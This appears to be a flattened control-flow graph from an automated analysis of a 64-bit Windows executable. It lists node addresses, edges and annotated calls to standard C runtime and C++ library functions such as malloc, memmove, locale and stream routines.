5559->5560 5562 7ff6c12a1b85 5559->5562 5563 7ff6c12a8010 5560->5563 5562->5472 5566 7ff6c12a803d 5563->5566 5567 7ff6c12a80ff Concurrency::cancel_current_task 5563->5567 5564 7ff6c12aa594 ?_Xlength_error@std@@YAXPEBD 5565 7ff6c12a810a 5564->5565 5569 7ff6c12a757c malloc 5565->5569 5570 7ff6c12a8095 5566->5570 5571 7ff6c12a80c4 _invalid_parameter_noinfo_noreturn 5566->5571 5567->5564 5568 7ff6c12a80ad 5572 7ff6c12a80ba 5568->5572 5576 7ff6c12a80cb 5568->5576 5573 7ff6c12a8131 5569->5573 5570->5567 5570->5568 5571->5576 5574 7ff6c12a1a70 _invalid_parameter_noinfo_noreturn malloc 5572->5574 5575 7ff6c12a82d4 47 API calls 5573->5575 5577 7ff6c12a80c2 5574->5577 5579 7ff6c12a813c 5575->5579 5576->5577 5578 7ff6c12acc88 std::_Facet_Register malloc 5576->5578 5577->5562 5578->5577 5580 7ff6c12a818a 5579->5580 5581 7ff6c12a8ce0 malloc 5579->5581 5582 7ff6c12a8150 5581->5582 5583 7ff6c12a8d64 malloc 5582->5583 5584 7ff6c12a8158 5583->5584 5584->5562 5586 7ff6c12a5010 9 API calls 5585->5586 5590 7ff6c12a893e 5586->5590 5587 7ff6c12a896f 5589 7ff6c12a5010 9 API calls 5587->5589 5588 7ff6c12a9638 62 API calls 5588->5590 5591 7ff6c12a897b 5589->5591 5590->5587 5590->5588 5592 7ff6c12a8a41 5590->5592 5593 7ff6c12a9638 62 API calls 5591->5593 5594 7ff6c12a6048 49 API calls 5592->5594 5595 7ff6c12a8996 5593->5595 5596 7ff6c12a8a4d 5594->5596 5597 7ff6c12a8a4f 5595->5597 5600 7ff6c12a6048 49 API calls 5595->5600 5606 7ff6c12a89af 5595->5606 5599 7ff6c12a5a1c _invalid_parameter_noinfo_noreturn 5596->5599 5604 7ff6c12a5a1c _invalid_parameter_noinfo_noreturn 5597->5604 5598 7ff6c12a8a54 5602 7ff6c12a6048 49 API calls 5598->5602 5605 7ff6c12a8a81 5599->5605 5600->5606 5601 7ff6c12a1aac 4 API calls 5601->5606 5602->5597 5603 7ff6c12a9638 62 API calls 5603->5606 5604->5596 5605->5495 5606->5597 5606->5598 5606->5601 5606->5603 5607 7ff6c12a6048 49 API calls 5606->5607 5607->5606 5609 7ff6c12a1bf0 5608->5609 5610 7ff6c12a1cac 5608->5610 5612 7ff6c12a1c53 5609->5612 5614 7ff6c12ab7e0 9 API calls 5609->5614 5611 7ff6c12a1d16 5610->5611 5613 7ff6c12a1ce6 ?tolower@?$ctype@D@std@@QEBADD ?tolower@?$ctype@D@std@@QEBADD 5610->5613 5611->5286 5612->5286 5613->5610 5613->5611 5614->5609 5616 7ff6c12ad872 RtlLookupFunctionEntry 5615->5616 5617 7ff6c12ad7af 5616->5617 5618 7ff6c12ad888 RtlVirtualUnwind 5616->5618 5619 7ff6c12ad750 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5617->5619 5618->5616 5618->5617 5620 7ff6c12a5e5c 5621 7ff6c12a5e6d 5620->5621 5622 7ff6c12a5e92 5620->5622 5621->5622 5623 7ff6c12a5eae _invalid_parameter_noinfo_noreturn 5621->5623 5624 7ff6c12a5ec9 5623->5624 5626 7ff6c12a5ef2 5623->5626 5625 7ff6c12a5f0e _invalid_parameter_noinfo_noreturn 5624->5625 5624->5626 5754 7ff6c12ad2d4 5757 7ff6c12ad8cc 5754->5757 5758 7ff6c12ad8ef GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5757->5758 5759 7ff6c12ad2dd 5757->5759 5758->5759 5764 7ff6c12adbd5 5765 7ff6c12adbf5 5764->5765 5766 7ff6c12adbe8 5764->5766 5767 7ff6c12a5cc4 std::locale::global _invalid_parameter_noinfo_noreturn 5766->5767 5767->5765 5627 7ff6c12ae046 5628 7ff6c12ae059 5627->5628 5629 7ff6c12ae066 5627->5629 5631 7ff6c12a5cc4 5628->5631 5632 7ff6c12a5cd7 5631->5632 5634 7ff6c12a5cfb 5631->5634 5633 7ff6c12a5d19 _invalid_parameter_noinfo_noreturn 5632->5633 5632->5634 5634->5629 5768 7ff6c12a62c8 free 5769 7ff6c12a62f0 5768->5769 5770 7ff6c12adfc7 5771 7ff6c12adfe8 5770->5771 5772 7ff6c12adfda ??1_Locinfo@std@@QEAA 5770->5772 5772->5771 5773 7ff6c12a19cc 5774 7ff6c12a19d5 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 5773->5774 5775 7ff6c12a1a00 5774->5775 5776 7ff6c12a19f4 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5774->5776 5776->5775 5635 7ff6c12ad144 5639 7ff6c12ad6e4 SetUnhandledExceptionFilter 5635->5639 5777 7ff6c12addc2 5778 7ff6c12addd5 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 5777->5778 5779 7ff6c12addea 5777->5779 5778->5779 5780 7ff6c12a18b9 5781 7ff6c12a18bf 5780->5781 5782 7ff6c12a564c ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 5781->5782 5783 7ff6c12a2e81 5782->5783 5784 7ff6c12a2ed6 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 5783->5784 5786 7ff6c12a2ead ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5783->5786 5790 7ff6c12a2e89 5783->5790 5788 7ff6c12a2ec8 5784->5788 5784->5790 5785 7ff6c12a2f37 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 5787 7ff6c12a2f56 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5785->5787 5791 7ff6c12a2f62 5785->5791 5786->5783 5786->5788 5787->5791 5788->5785 5789 7ff6c12a2ef8 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5788->5789 5788->5790 5789->5788 5789->5790 5790->5785 5640 7ff6c12adf37 5641 7ff6c12adf57 5640->5641 5642 7ff6c12adf4a 5640->5642 5644 7ff6c12a5d20 5642->5644 5645 7ff6c12aa294 5644->5645 5646 7ff6c12aa2d0 5645->5646 5647 7ff6c12aa2ef _invalid_parameter_noinfo_noreturn 5645->5647 5646->5641 5648 7ff6c12aab3c 5649 7ff6c12aac05 5648->5649 5653 7ff6c12aab93 5648->5653 5650 7ff6c12aac0a 5649->5650 5651 7ff6c12aa634 2 API calls 5649->5651 5651->5650 5652 7ff6c12aa634 2 API calls 5652->5653 5653->5649 5653->5652 5654 7ff6c12aabe4 _Strxfrm 5653->5654 5654->5650 5654->5653 5655 7ff6c12aafb0 5656 7ff6c12aafc1 5655->5656 5657 7ff6c12a1d68 5 API calls 5656->5657 5658 7ff6c12aafea 5657->5658 5659 7ff6c12ab3b0 5660 7ff6c12ab3d2 5659->5660 5662 7ff6c12ab3fc 5659->5662 5661 7ff6c12ab3eb ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXH 5660->5661 5660->5662 5661->5662 5667 7ff6c12a2dac 5668 7ff6c12a2e0d 5667->5668 5670 7ff6c12a2db1 5667->5670 5669 7ff6c12a2de0 realloc 5669->5670 5671 7ff6c12a2e28 ?_Xbad_alloc@std@ 5669->5671 5670->5668 5670->5669 5672 7ff6c12a2e30 5671->5672 5673 7ff6c12a564c ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 5672->5673 5681 7ff6c12a2e81 5673->5681 5674 7ff6c12a2ed6 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 5677 7ff6c12a2e89 5674->5677 5678 7ff6c12a2ec8 5674->5678 5675 7ff6c12a2f37 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 5679 7ff6c12a2f62 5675->5679 5680 7ff6c12a2f56 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5675->5680 5676 7ff6c12a2ead ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5676->5678 5676->5681 5677->5675 5678->5675 5678->5677 5682 7ff6c12a2ef8 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5678->5682 5680->5679 5681->5674 5681->5676 5681->5677 5682->5677 5682->5678 5803 7ff6c12a2c20 5804 7ff6c12a2d4e 5803->5804 5805 7ff6c12a2c4d 5803->5805 5805->5804 5808 7ff6c12a2700 5805->5808 5812 7ff6c12a378c 5805->5812 5809 7ff6c12a2769 5808->5809 5811 7ff6c12a2725 5808->5811 5809->5805 5810 7ff6c12a378c 11 API calls 5810->5811 5811->5809 5811->5810 5813 7ff6c12a38c6 5812->5813 5814 7ff6c12a37cc 5812->5814 5841 7ff6c12aa580 ?_Xlength_error@std@@YAXPEBD 5813->5841 5815 7ff6c12a37e0 5814->5815 5818 7ff6c12a3822 5814->5818 5819 7ff6c12a1a70 2 API calls 5815->5819 5820 7ff6c12a381d 5818->5820 5823 7ff6c12acc88 std::_Facet_Register malloc 5818->5823 5819->5820 5827 7ff6c12a388f memmove 5820->5827 5828 7ff6c12a3844 memmove 5820->5828 5823->5820 5833 7ff6c12a387b 5827->5833 5830 7ff6c12a3866 5828->5830 5828->5833 5832 7ff6c12a3888 _invalid_parameter_noinfo_noreturn 5830->5832 5830->5833 5832->5827 5833->5805 5842 7ff6c12adc1f 5849 7ff6c12aa9c8 5842->5849 5851 7ff6c12aa9e0 _invalid_parameter_noinfo_noreturn 5849->5851 5852 7ff6c12a6a24 5853 7ff6c12a6a52 5852->5853 5854 7ff6c12a6af6 5853->5854 5855 7ff6c12acc88 std::_Facet_Register malloc 5853->5855 5856 7ff6c12a6ab9 memset 5853->5856 5855->5853 5856->5853 5858 7ff6c12a6424 free ??1facet@locale@std@@MEAA 5859 7ff6c12a6455 5858->5859 5687 7ff6c12ae098 5688 7ff6c12ae0cd __current_exception __current_exception_context terminate 5687->5688 5689 7ff6c12ae0c1 5687->5689 5688->5689 5690 7ff6c12a5498 __std_exception_copy 5860 7ff6c12a2918 5865 7ff6c12a293b 5860->5865 5861 7ff6c12a2bd9 5862 7ff6c12a2bcf 5862->5861 5863 7ff6c12a378c 11 API calls 5862->5863 5863->5861 5864 7ff6c12a378c 11 API calls 5864->5865 5865->5861 5865->5862 5865->5864 5866 7ff6c12a2700 11 API calls 5865->5866 5866->5865 5691 7ff6c12adb8e ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 5868 7ff6c12ae10f _seh_filter_exe 5692 7ff6c12a6294 5695 7ff6c12a58dc 5692->5695 5694 7ff6c12a62a8 5696 7ff6c12a5924 5695->5696 5697 7ff6c12a5929 5696->5697 5698 7ff6c12a5908 free 5696->5698 5699 7ff6c12a5943 free 5697->5699 5700 7ff6c12a5957 5697->5700 5698->5696 5699->5700 5701 7ff6c12a5960 free 5700->5701 5702 7ff6c12a5975 5700->5702 5701->5702 5703 7ff6c12a597b free 5702->5703 5704 7ff6c12a599c 5702->5704 5703->5702 5704->5694 5705 7ff6c12ad288 5706 7ff6c12ad690 GetModuleHandleW 5705->5706 5707 7ff6c12ad28f 5706->5707 5708 7ff6c12ad2c9 _exit 5707->5708 5709 7ff6c12ad293 5707->5709 5873 7ff6c12add07 ??1_Lockit@std@@QEAA 5874 7ff6c12a6008 ?uncaught_exception@std@ 5875 7ff6c12a6024 5874->5875 5876 7ff6c12a601a ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5874->5876 5876->5875 5877 7ff6c12a1000 5878 7ff6c12a1071 5877->5878 5878->5878 5921 7ff6c12a51fc 5878->5921 5922 7ff6c12a522f 5921->5922 5942 7ff6c12a4bec ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 5922->5942 5924 7ff6c12a523c 5955 7ff6c12a4cc4 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 5924->5955 5926 7ff6c12a5248 5967 7ff6c12a40cc 5926->5967 5943 7ff6c12a4c36 5942->5943 5944 7ff6c12a4ca4 ??1_Lockit@std@@QEAA 5943->5944 5945 7ff6c12a4c4d ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 5943->5945 5946 7ff6c12a4c58 5943->5946 5944->5924 5945->5946 5946->5944 5954 7ff6c12a4c6a 5946->5954 5974 7ff6c12a8f38 5946->5974 5949 7ff6c12a4c82 5988 7ff6c12ac984 5949->5988 5950 7ff6c12a4cbd 5991 7ff6c12a9fe8 5950->5991 5954->5944 5956 7ff6c12a4d0f 5955->5956 5957 7ff6c12a4d83 ??1_Lockit@std@@QEAA 5956->5957 5958 7ff6c12a4d26 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 5956->5958 5959 7ff6c12a4d31 5956->5959 5957->5926 5958->5959 5959->5957 5960 7ff6c12a4d48 ?_Getcat@?$ctype@D@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 5959->5960 5961 7ff6c12a4d9e 5960->5961 5962 7ff6c12a4d5c 5960->5962 5963 7ff6c12a9fe8 _CxxThrowException 5961->5963 5964 7ff6c12ac984 std::_Facet_Register malloc 5962->5964 5965 7ff6c12a4da3 5963->5965 5966 7ff6c12a4d6e 5964->5966 5966->5957 6006 7ff6c12a4f04 5967->6006 5969 7ff6c12a40fd 6013 7ff6c12a810c 5969->6013 5975 7ff6c12a905a 5974->5975 5976 7ff6c12a8f6f 5974->5976 5977 7ff6c12ad030 8 API calls 5975->5977 5976->5975 5978 7ff6c12acc88 std::_Facet_Register malloc 5976->5978 5979 7ff6c12a4c7c 5977->5979 5980 7ff6c12a8f80 5978->5980 5979->5949 5979->5950 5981 7ff6c12a8ff8 5980->5981 5994 7ff6c12ab07c 5980->5994 5984 7ff6c12a9004 ??1_Locinfo@std@@QEAA 5981->5984 5985 7ff6c12a9013 5981->5985 5984->5985 5985->5975 5987 7ff6c12a9053 _invalid_parameter_noinfo_noreturn 5985->5987 5987->5975 5989 7ff6c12acc88 std::_Facet_Register malloc 5988->5989 5990 7ff6c12ac997 5989->5990 5990->5954 6005 7ff6c12a55bc 5991->6005 5993 7ff6c12a9ff6 _CxxThrowException 5995 7ff6c12ab0e5 memmove 5994->5995 5996 7ff6c12ab0b2 ?c_str@?$_Yarn@D@std@ 5994->5996 5999 7ff6c12ab14f 5995->5999 5997 7ff6c12ab0cf 5996->5997 5997->5997 6000 7ff6c12a1d68 5 API calls 5997->6000 6003 7ff6c12ab1c6 _invalid_parameter_noinfo_noreturn 5999->6003 6004 7ff6c12ab1cd 5999->6004 6000->5995 6001 7ff6c12ad030 8 API calls 6002 7ff6c12a8f9d ??0_Locinfo@std@@QEAA@PEBD ??0facet@locale@std@@IEAA@_K ?_Getcoll@_Locinfo@std@@QEBA?AU_Collvec@ 6001->6002 6002->5981 6003->6004 6004->6001 6005->5993 6023 7ff6c12a1ffc 6006->6023 6009 7ff6c12aa444 47 API calls 6010 7ff6c12a4f66 6009->6010 6038 7ff6c12a4da4 6010->6038 6012 7ff6c12a4f7a 6012->5969 6043 7ff6c12a757c 6013->6043 6018 7ff6c12a818a 6024 7ff6c12a2005 6023->6024 6037 7ff6c12a20b1 6023->6037 6025 7ff6c12a20c5 6024->6025 6026 7ff6c12a2034 6024->6026 6042 7ff6c12aa594 ?_Xlength_error@std@@YAXPEBD 6025->6042 6028 7ff6c12a2052 6026->6028 6029 7ff6c12a2045 6026->6029 6032 7ff6c12acc88 std::_Facet_Register malloc 6028->6032 6033 7ff6c12a204d 6028->6033 6031 7ff6c12a1a70 2 API calls 6029->6031 6031->6033 6032->6033 6041 7ff6c12a2f98 memcmp 6033->6041 6035 7ff6c12a207a 6036 7ff6c12a5adc 4 API calls 6035->6036 6036->6037 6037->6009 6039 7ff6c12acc88 std::_Facet_Register malloc 6038->6039 6040 7ff6c12a4dc6 6039->6040 6040->6012 6041->6035 6044 7ff6c12acc88 std::_Facet_Register malloc 6043->6044 6045 7ff6c12a7595 6044->6045 6046 7ff6c12a82d4 6045->6046 6047 7ff6c12a82fc 6046->6047 6065 7ff6c12a71a4 6047->6065 6049 7ff6c12a8327 6073 7ff6c12a75e4 6049->6073 6051 7ff6c12a813c 6051->6018 6058 7ff6c12a8ce0 6051->6058 6052 7ff6c12a830b 6052->6049 6052->6051 6053 7ff6c12a8ce0 malloc 6052->6053 6053->6049 6054 7ff6c12a71a4 47 API calls 6056 7ff6c12a8332 6054->6056 6056->6051 6056->6054 6057 7ff6c12a8ce0 malloc 6056->6057 6078 7ff6c12a8c20 6056->6078 6057->6056 6059 7ff6c12a8cfd 6058->6059 6060 7ff6c12acc88 std::_Facet_Register malloc 6059->6060 6061 7ff6c12a8150 6060->6061 6062 7ff6c12a8d64 6061->6062 6287 7ff6c12a9b84 6062->6287 6068 7ff6c12a71b6 6065->6068 6066 7ff6c12a7331 6066->6052 6068->6066 6082 7ff6c12a6790 6068->6082 6093 7ff6c12a9c50 6068->6093 6102 7ff6c12a7374 6068->6102 6114 7ff6c12a7a70 6068->6114 6140 7ff6c12aa4cc 6068->6140 6074 7ff6c12acc88 std::_Facet_Register malloc 6073->6074 6075 7ff6c12a7603 6074->6075 6076 7ff6c12acc88 std::_Facet_Register malloc 6075->6076 6077 7ff6c12a7648 6076->6077 6077->6056 6079 7ff6c12a8c56 6078->6079 6080 7ff6c12acc88 std::_Facet_Register malloc 6079->6080 6081 7ff6c12a8c6a 6080->6081 6081->6056 6083 7ff6c12a67b4 6082->6083 6084 7ff6c12a67bf 6083->6084 6152 7ff6c12a7140 6083->6152 6086 7ff6c12a67c8 ?tolower@?$ctype@D@std@@QEBADD 6084->6086 6088 7ff6c12a67db 6084->6088 6087 7ff6c12a67f0 6086->6087 6090 7ff6c12a6803 realloc 6087->6090 6091 7ff6c12a6816 6087->6091 6088->6087 6089 7ff6c12ab7e0 9 API calls 6088->6089 6089->6087 6090->6091 6092 7ff6c12a683e ?_Xbad_alloc@std@ 6090->6092 6091->6068 6094 7ff6c12a9c7b 6093->6094 6097 7ff6c12a9c80 6093->6097 6095 7ff6c12a9d32 6094->6095 6094->6097 6155 7ff6c12a82b0 6094->6155 6095->6068 6099 7ff6c12a9d4d 6097->6099 6158 7ff6c12a6e74 6097->6158 6100 7ff6c12a9cd5 6100->6097 6100->6099 6101 7ff6c12a82b0 22 API calls 6100->6101 6101->6097 6103 7ff6c12a73fe 6102->6103 6104 7ff6c12a7389 6102->6104 6231 7ff6c12a7b74 6103->6231 6105 7ff6c12a82b0 22 API calls 6104->6105 6107 7ff6c12a7393 6105->6107 6107->6103 6108 7ff6c12a7397 6107->6108 6109 7ff6c12a73a6 6108->6109 6112 7ff6c12a73b2 6108->6112 6111 7ff6c12a73f8 6109->6111 6238 7ff6c12a7ad8 6109->6238 6111->6068 6112->6111 6228 7ff6c12a6728 6112->6228 6115 7ff6c12a6994 malloc 6114->6115 6116 7ff6c12a7a89 6115->6116 6136 7ff6c12a7abb 6116->6136 6253 7ff6c12a698c 6116->6253 6118 7ff6c12a7cb8 35 API calls 6118->6136 6119 7ff6c12a7eec 6119->6068 6120 7ff6c12a698c 3 API calls 6120->6136 6121 7ff6c12a7ed5 6124 7ff6c12a698c 3 API calls 6121->6124 6123 7ff6c12a7ef7 6126 7ff6c12a7f99 6123->6126 6130 7ff6c12a8003 Concurrency::cancel_current_task 6123->6130 6133 7ff6c12a7fc8 _invalid_parameter_noinfo_noreturn 6123->6133 6127 7ff6c12a7ee1 6124->6127 6129 7ff6c12a7fb1 6126->6129 6126->6130 6128 7ff6c12a698c 3 API calls 6127->6128 6128->6119 6134 7ff6c12a7fcf 6129->6134 6135 7ff6c12a7fbe 6129->6135 6278 7ff6c12aa594 ?_Xlength_error@std@@YAXPEBD 6130->6278 6131 7ff6c12ab7e0 9 API calls 6131->6136 6133->6134 6137 7ff6c12a7fc6 6134->6137 6139 7ff6c12acc88 std::_Facet_Register malloc 6134->6139 6138 7ff6c12a1a70 2 API calls 6135->6138 6136->6118 6136->6119 6136->6120 6136->6121 6136->6123 6136->6131 6261 7ff6c12a6ccc 6136->6261 6137->6068 6138->6137 6139->6137 6141 7ff6c12aa4ec 6140->6141 6142 7ff6c12aa52d 6141->6142 6148 7ff6c12aa4fa 6141->6148 6150 7ff6c12aa555 6141->6150 6143 7ff6c12aa540 6142->6143 6144 7ff6c12aa536 6142->6144 6146 7ff6c12aa51d 6143->6146 6147 7ff6c12a83d0 47 API calls 6143->6147 6145 7ff6c12a88c0 47 API calls 6144->6145 6145->6146 6146->6068 6147->6146 6148->6144 6149 7ff6c12aa50e 6148->6149 6149->6150 6151 7ff6c12a838c 47 API calls 6149->6151 6151->6146 6153 7ff6c12acc88 std::_Facet_Register malloc 6152->6153 6154 7ff6c12a7153 6153->6154 6177 7ff6c12a8550 6155->6177 6157 7ff6c12a82c7 6157->6100 6159 7ff6c12a6ea8 6158->6159 6162 7ff6c12a6ec8 6158->6162 6160 7ff6c12a6790 13 API calls 6159->6160 6159->6162 6160->6162 6161 7ff6c12a7072 6163 7ff6c12acc88 std::_Facet_Register malloc 6161->6163 6162->6161 6164 7ff6c12a6ef1 6162->6164 6165 7ff6c12a707c 6163->6165 6166 7ff6c12acc88 std::_Facet_Register malloc 6164->6166 6168 7ff6c12acc88 std::_Facet_Register malloc 6165->6168 6167 7ff6c12a6efb 6166->6167 6169 7ff6c12acc88 std::_Facet_Register malloc 6167->6169 6176 7ff6c12a6fe1 6168->6176 6170 7ff6c12a6f33 6169->6170 6171 7ff6c12acc88 std::_Facet_Register malloc 6170->6171 6172 7ff6c12a6f6f 6171->6172 6173 7ff6c12acc88 std::_Facet_Register malloc 6172->6173 6174 7ff6c12a6fab 6173->6174 6175 7ff6c12acc88 std::_Facet_Register malloc 6174->6175 6175->6176 6176->6095 6183 7ff6c12a8576 6177->6183 6178 7ff6c12a8687 6187 7ff6c12a48ac 6178->6187 6179 7ff6c12a86bb 6181 7ff6c12a86c0 6179->6181 6182 7ff6c12a86d9 6179->6182 6186 7ff6c12a85dc 6181->6186 6191 7ff6c12a6b24 6181->6191 6182->6186 6204 7ff6c12a69fc 6182->6204 6183->6178 6183->6179 6183->6186 6186->6157 6189 7ff6c12a4925 6187->6189 6190 7ff6c12a48ed 6187->6190 6189->6186 6190->6189 6207 7ff6c12a4830 6190->6207 6211 7ff6c12a4a30 6191->6211 6193 7ff6c12a4a30 16 API calls 6200 7ff6c12a6b62 6193->6200 6194 7ff6c12a6ba3 memcmp 6194->6200 6195 7ff6c12a6c55 6197 7ff6c12a6c92 6195->6197 6201 7ff6c12a6c84 _invalid_parameter_noinfo_noreturn 6195->6201 6196 7ff6c12a6c8b _invalid_parameter_noinfo_noreturn 6196->6197 6199 7ff6c12ad030 8 API calls 6197->6199 6198 7ff6c12acc88 std::_Facet_Register malloc 6198->6200 6202 7ff6c12a6ca3 6199->6202 6200->6193 6200->6194 6200->6195 6200->6196 6200->6198 6203 7ff6c12a6c18 memset 6200->6203 6201->6196 6202->6186 6203->6200 6224 7ff6c12a79cc 6204->6224 6208 7ff6c12a4859 6207->6208 6209 7ff6c12a488a 6207->6209 6208->6209 6210 7ff6c12a485c ?tolower@?$ctype@D@std@@QEBADD ?tolower@?$ctype@D@std@@QEBADD 6208->6210 6209->6190 6210->6208 6210->6209 6212 7ff6c12a4a8b 6211->6212 6222 7ff6c12a4bc4 6211->6222 6214 7ff6c12a2254 _invalid_parameter_noinfo_noreturn memmove ?_Xlength_error@std@@YAXPEBD malloc 6212->6214 6213 7ff6c12ad030 8 API calls 6215 7ff6c12a4bdb 6213->6215 6216 7ff6c12a4ab4 ?tolower@?$ctype@D@std@@QEBAPEBDPEADPEBD 6214->6216 6215->6200 6220 7ff6c12a4ae6 6216->6220 6217 7ff6c12a4b59 6218 7ff6c12a4b8e 6217->6218 6221 7ff6c12a4b87 _invalid_parameter_noinfo_noreturn 6217->6221 6218->6222 6223 7ff6c12a4bbd _invalid_parameter_noinfo_noreturn 6218->6223 6219 7ff6c12a4b26 memmove 6219->6217 6220->6217 6220->6219 6220->6221 6221->6218 6222->6213 6223->6222 6225 7ff6c12a79fb 6224->6225 6226 7ff6c12acc88 std::_Facet_Register malloc 6225->6226 6227 7ff6c12a7a22 6225->6227 6226->6227 6229 7ff6c12acc88 std::_Facet_Register malloc 6228->6229 6230 7ff6c12a6741 6229->6230 6232 7ff6c12a7bd6 6231->6232 6234 7ff6c12a7b8b 6231->6234 6232->6109 6233 7ff6c12a7bc6 6233->6232 6247 7ff6c12a9c2c 6233->6247 6234->6232 6234->6233 6236 7ff6c12a7c2d 6234->6236 6244 7ff6c12a9090 6236->6244 6239 7ff6c12a7b2a 6238->6239 6240 7ff6c12a7afb 6238->6240 6239->6111 6241 7ff6c12a48ac 2 API calls 6240->6241 6242 7ff6c12a7b14 6241->6242 6242->6239 6250 7ff6c12a6994 6242->6250 6245 7ff6c12a8550 22 API calls 6244->6245 6246 7ff6c12a90ab 6245->6246 6246->6232 6248 7ff6c12a8550 22 API calls 6247->6248 6249 7ff6c12a9c42 6248->6249 6249->6232 6251 7ff6c12acc88 std::_Facet_Register malloc 6250->6251 6252 7ff6c12a69a7 6251->6252 6254 7ff6c12a68fc 6253->6254 6255 7ff6c12a691a ?tolower@?$ctype@D@std@@QEBADD 6254->6255 6257 7ff6c12a692b 6254->6257 6255->6257 6256 7ff6c12a695d 6256->6136 6257->6256 6258 7ff6c12acc88 std::_Facet_Register malloc 6257->6258 6259 7ff6c12a6940 6258->6259 6259->6256 6260 7ff6c12a694d memset 6259->6260 6260->6256 6262 7ff6c12a6cf4 ?tolower@?$ctype@D@std@@QEBADD ?tolower@?$ctype@D@std@@QEBADD 6261->6262 6263 7ff6c12a6d1a 6261->6263 6262->6263 6264 7ff6c12acc88 std::_Facet_Register malloc 6263->6264 6265 7ff6c12a6d8b 6263->6265 6267 7ff6c12a6d5b memset 6263->6267 6273 7ff6c12a6db4 6263->6273 6264->6263 6266 7ff6c12a6db9 6265->6266 6269 7ff6c12a6da3 6265->6269 6265->6273 6270 7ff6c12acc88 std::_Facet_Register malloc 6266->6270 6275 7ff6c12a6dca 6266->6275 6267->6263 6269->6273 6279 7ff6c12a6844 6269->6279 6270->6275 6271 7ff6c12a6e09 6271->6273 6274 7ff6c12a6e2a realloc 6271->6274 6272 7ff6c12a6df6 realloc 6272->6271 6276 7ff6c12a6e6e ?_Xbad_alloc@std@ 6272->6276 6273->6136 6274->6273 6277 7ff6c12a6e68 6274->6277 6275->6271 6275->6272 6277->6276 6280 7ff6c12a6867 ?tolower@?$ctype@D@std@@QEBADD 6279->6280 6281 7ff6c12a6878 6279->6281 6280->6281 6282 7ff6c12acc88 std::_Facet_Register malloc 6281->6282 6285 7ff6c12a688d 6281->6285 6282->6285 6283 7ff6c12a68cc 6283->6269 6284 7ff6c12a68b9 realloc 6284->6283 6286 7ff6c12a68f3 ?_Xbad_alloc@std@ 6284->6286 6285->6283 6285->6284 6288 7ff6c12acc88 std::_Facet_Register malloc 6287->6288 6289 7ff6c12a9b9d 6288->6289 5711 7ff6c12ad07c 5712 7ff6c12ad08c 5711->5712 5724 7ff6c12acd54 5712->5724 5714 7ff6c12ad4fc 9 API calls 5715 7ff6c12ad131 5714->5715 5716 7ff6c12ad0b0 _RTC_Initialize 5722 7ff6c12ad113 5716->5722 5732 7ff6c12ad980 InitializeSListHead 5716->5732 5722->5714 5723 7ff6c12ad121 5722->5723 5725 7ff6c12acd65 5724->5725 5726 7ff6c12acd97 5724->5726 5727 7ff6c12acdd4 5725->5727 5730 7ff6c12acd6a __scrt_acquire_startup_lock 5725->5730 5726->5716 5728 7ff6c12ad4fc 9 API calls 5727->5728 5729 7ff6c12acdde 5728->5729 5730->5726 5731 7ff6c12acd87 _initialize_onexit_table 5730->5731 5731->5726 6315 7ff6c12ab1fc 6316 7ff6c12ab224 6315->6316 6317 7ff6c12ab229 6315->6317 6316->6317 6318 7ff6c12ab24b ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6316->6318 6319 7ff6c12ab267 6316->6319 6318->6317 6321 7ff6c12ab2b1 6319->6321 6322 7ff6c12ab29d 6319->6322 6320 7ff6c12acc88 std::_Facet_Register malloc 6324 7ff6c12ab2aa memmove 6320->6324 6321->6317 6323 7ff6c12a1a70 2 API calls 6321->6323 6322->6320 6322->6324 6323->6324 6328 7ff6c12ab305 6324->6328 6326 7ff6c12ab376 ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6327 7ff6c12ab38b _invalid_parameter_noinfo_noreturn 6326->6327 6327->6317 6328->6326 6328->6327 6329 7ff6c12a57fc 6330 7ff6c12a580e 6329->6330 6331 7ff6c12a5837 6329->6331 6330->6331 6332 7ff6c12a5854 _invalid_parameter_noinfo_noreturn 6330->6332

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
